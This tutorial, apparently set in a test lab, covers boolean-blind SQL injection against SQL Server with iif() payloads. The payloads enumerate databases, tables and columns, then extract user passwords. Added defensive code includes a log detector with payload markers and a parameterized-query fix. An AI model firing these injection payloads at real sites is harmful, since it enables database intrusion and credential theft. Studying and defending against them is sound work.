0x00 How to remember it

and 1=iif(condition, 1, 0);

When the condition is true the query returns the same rows it normally would; when it is false no rows come back.

0x01 Baseline data

  1> select * from article;
  2> go
  +----+-----------+-----------+
  | id | title     | content   |
  +----+-----------+-----------+
  | 1  | 测试标题  | 测试内容  |
  | 2  | 测试标题2 | 测试内容2 |
  +----+-----------+-----------+
  (2 rows affected)

  # test table data: users;
  sql server> select * from users;
  +----+--------------+----------+
  | id | username     | password |
  +----+--------------+----------+
  | 1  | test-user-01 | 123456   |
  | 2  | test-user-02 | 234567   |
  +----+--------------+----------+
  2 rows in set (0.00 sec)

  sql server> SELECT system_user;
  +--------+
  | field1 |
  +--------+
  | sa     |
  +--------+
  1 row in set (0.00 sec)

  sql server> select db_name();
  +--------+
  | field1 |
  +--------+
  | test   |
  +--------+
  1 row in set (0.00 sec)

0x02 Getting the data length

  1> select LEN(system_user);
  2> go
  +---+
  |   |
  +---+
  | 2 |
  +---+
  (1 rows affected)

0x03 Reading the currently connected database

Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(),1)='t',1,0)

Database query: select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0)

  # first character of the current database name
  # correct case
  1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0);
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)
  # wrong case
  1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='aaaa',1,0);
  2> go
  +----+-------+---------+
  | id | title | content |
  +----+-------+---------+
  +----+-------+---------+
  (0 rows affected)

  # second character of the current database name (LEFT(..., 2) compares the first two)
  # correct case
  1> select * from article where id=1 and 1=iif(LEFT(db_name(),2)='te',1,0);
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)
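
A defender-side check for the request shape shown above, added here as an example and not code from the original post. It takes a few constructed Apache-style access log lines, URL-decodes every query parameter, flags an `id` that is not a plain integer, and flags any value carrying the function and object names these payloads rely on (iif(, db_name(, information_schema., ROW_NUMBER(), LEN(). It goes a little beyond this section: the marker list also catches the table, column and content probes used later in the post. The log lines, the `INTEGER_PARAMS` set and the `ORACLE_MARKERS` list are assumptions about the application (sql.php is expected to take a numeric id).

```python
"""Flag web requests that carry the boolean-blind T-SQL shape used in this post.

Added example, not code from the original post. The access log lines below are
constructed for the example; INTEGER_PARAMS and ORACLE_MARKERS are assumptions
about the application (sql.php expects a numeric id).
"""
import re
from urllib.parse import parse_qsl, unquote_plus

# Query parameters the application only ever expects as a plain integer.
INTEGER_PARAMS = {"id"}

# Function and object names the payloads in this post depend on. They are
# matched against the lower-cased, decoded value with "name (" folded to "name(".
ORACLE_MARKERS = (
    "iif(",
    "db_name(",
    "system_user",
    "information_schema.",
    "row_number()",
    "len(",
)

LOG_LINES = [  # constructed sample traffic, not real logs
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql.php?id=1%20and%201=iif(LEFT(db_name(),1)=%27t%27,1,0) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sql.php?id=1%20and%201=iif(LEFT(db_name(),1)=%27a%27,1,0) HTTP/1.1" 200 87',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sql.php?id=1%20and%201%3Diif(LEFT((select%20table_name%20from%20(select%20ROW_NUMBER()%20OVER(Order%20by%20table_name)%20AS%20row_number,table_name%20FROM%20information_schema.tables%20where%20table_catalog%3Ddb_name())%20as%20a%20where%20row_number%3D1),1)%3D%27a%27,1,0) HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=iif HTTP/1.1" 200 300',
]

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
_WS = re.compile(r"\s+")


def normalize(value: str) -> str:
    """parse_qsl has decoded once already; decode again to catch double encoding,
    then lower-case, collapse whitespace and drop the space in "iif (" style calls."""
    v = unquote_plus(value).lower()
    v = _WS.sub(" ", v)
    return v.replace(" (", "(")


def markers_in(value: str) -> list:
    """Markers present in the normalized value, in ORACLE_MARKERS order."""
    v = normalize(value)
    return [m for m in ORACLE_MARKERS if m in v]


def inspect_request(line: str):
    """Return (path, reasons) for one combined-format access log line, or None
    if the line holds no request line. An empty reasons list means clean."""
    m = _REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not value.strip().isdigit():
            reasons.append(f"{name} is not an integer")
        hits = markers_in(value)
        if hits:
            reasons.append(f"{name} contains " + ", ".join(hits))
    return path, reasons


def scan(lines):
    """One record per flagged request: source address, path and the reasons."""
    flagged = []
    for line in lines:
        result = inspect_request(line)
        if result and result[1]:
            path, reasons = result
            flagged.append({"ip": line.split(" ", 1)[0], "path": path, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for rec in scan(LOG_LINES):
        print(rec["ip"], rec["path"], "; ".join(rec["reasons"]))
```

The type check on `id` is the more robust of the two signals: the marker list can be evaded by encoding tricks, but a parameter that must be an integer and is not one is wrong regardless of what it contains. The other thing worth correlating in real logs is the pattern this post relies on: many near-identical requests from one source that differ only in the compared character, with the response size alternating between the "row returned" and "no row" values.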

0x04 Guessing database names

Note: changing the call to db_name(1) shows other database names (the argument is the database id).
For example:
db_name(1) gives database 1
db_name(2) gives database 2

Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0)

Database query: select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0)

  # first character of database 1
  # correct case
  1> select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0);
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

  # second character of database 1 (LEFT(..., 2) compares the first two)
  # correct case
  1> select * from article where id=1 and 1=iif(LEFT(db_name(1),2)='ma',1,0);
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

0x05 Guessing table names

Note:
the table_name inside OVER(Order by table_name) must be replaced with a column that actually exists in information_schema.tables

Changing the second argument of LEFT() controls how many leading characters are compared

To query a different database:
For example:
table_catalog=db_name() (the current database)
table_catalog='name of the database to query'

To query a different table (rows are ordered by table_name):
For example:
row_number=1 gives the first table
row_number=2 gives the second table

Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)='a',1,0)

Database query: select * from article where id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)='a',1,0)

  # first character of the first table in the current database
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT table_name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number,
                         table_name
                  FROM information_schema.tables
                  WHERE table_catalog = db_name()) AS a
            WHERE row_number = 1),
           1
         ) = 'a',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

  # second character of the first table in the current database (LEFT(..., 2) compares the first two)
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT table_name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number,
                         table_name
                  FROM information_schema.tables
                  WHERE table_catalog = db_name()) AS a
            WHERE row_number = 1),
           2
         ) = 'ar',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

0x06 Guessing column names

Note:
the column_name inside OVER(Order by column_name) must be replaced with a column that actually exists in information_schema.columns

To query a different table:
For example:
table_name='name of the table to query'

To query a different column (rows are ordered by column_name):
For example:
row_number=1 gives the first column
row_number=2 gives the second column

Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1),1)='i',1,0)

Database query: select * from article where id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1),1)='i',1,0)

  # first character of the first column of the users table in the current database
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT column_name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number,
                         column_name
                  FROM information_schema.columns
                  WHERE table_catalog = db_name()
                    AND table_name = 'users') AS a
            WHERE row_number = 1),
           1
         ) = 'i',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

  # second character of the first column of the users table in the current database (LEFT(..., 2) compares the first two)
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT column_name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number,
                         column_name
                  FROM information_schema.columns
                  WHERE table_catalog = db_name()
                    AND table_name = 'users') AS a
            WHERE row_number = 1),
           2
         ) = 'id',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

0x07 Guessing content

Note:
the username inside OVER(Order by username) must be replaced with a column that actually exists in the users table

To get data from a different column, change the a.username in the web request
For example
the users table has the columns id, username, password
because I used an alias, to get the other columns change it to
a.id, a.username, a.password

To query a different row:
For example:
row_number=1 gives the first row
row_number=2 gives the second row

Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)='t',1,0)

Database query: select * from article where id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)='t',1,0)

  # first 9 characters of the username column of the first row of the users table
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT a.username
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
                  FROM users) AS a
            WHERE row_number = 1),
           9
         ) = 'test-user',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)

  # first 6 characters of the password column of the second row of the users table (rows ordered by password)
  1> SELECT *
     FROM article
     WHERE id = 1
       AND 1 = iif(
         LEFT(
           (SELECT a.password
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY password) AS row_number, *
                  FROM users) AS a
            WHERE row_number = 2),
           6
         ) = '234567',
         1,
         0
       );
  2> go
  +----+----------+----------+
  | id | title    | content  |
  +----+----------+----------+
  | 1  | 测试标题 | 测试内容 |
  +----+----------+----------+
  (1 rows affected)
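
The fix side of everything above, added here as an example and not part of the original post. It puts the string-spliced query behind sql.php?id=... next to a hardened version that first checks the parameter is plain digits and then binds it as a parameter. sqlite3 stands in for SQL Server so the snippet runs offline (an assumption; the table rows are constructed), and a plain `1=1` / `1=2` condition takes the place of the iif(...) test. With parameter binding the whole string is a value, never SQL text, so the true/false oracle used throughout this post has nothing to act on.

```python
"""The pattern behind sql.php?id=... beside a hardened version.

Added example, not code from the original post. sqlite3 stands in for SQL Server
so the snippet runs offline; the table contents are constructed and the
condition "1=1" / "1=2" takes the place of the iif(...) test in the post.
"""
import re
import sqlite3

# Only plain digits; one to ten of them is plenty for an article id.
_ID = re.compile(r"[0-9]{1,10}")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the article table shown at the top of the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "create table article(id integer primary key, title text, content text);"
        "insert into article values (1, 'test title', 'test content');"
        "insert into article values (2, 'test title 2', 'test content 2');"
    )
    return conn


def query_vulnerable(conn, raw_id: str):
    """The request parameter is spliced into the statement text, so
    'id=1 and <condition>' turns the row count into a true/false oracle."""
    return conn.execute(f"select * from article where id={raw_id}").fetchall()


def is_valid_id(raw_id) -> bool:
    """Accept only plain digits. int() alone is too lenient: it accepts
    surrounding whitespace and underscores such as '1_0' (which is 10)."""
    return isinstance(raw_id, str) and _ID.fullmatch(raw_id) is not None


def query_hardened(conn, raw_id: str):
    """Validate the type first, then bind the value as a parameter so the
    database never sees it as part of the SQL text."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    return conn.execute("select * from article where id = ?", (int(raw_id),)).fetchall()


def hardened_rejects(conn, raw_id) -> bool:
    """True when the hardened path refuses the input."""
    try:
        query_hardened(conn, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print(repr(probe), "vulnerable ->", query_vulnerable(db, probe),
              "| hardened rejects ->", hardened_rejects(db, probe))
```

The vulnerable function shows the oracle exactly as the post describes it: `1 and 1=1` returns the row, `1 and 1=2` returns nothing. The hardened function gives the same answer for every non-numeric input, a 400-style rejection, so the response no longer depends on the condition. The integer check is a belt-and-braces addition; the parameter binding is what actually closes the hole, and it is the part that must not be skipped for string parameters where no simple format check exists.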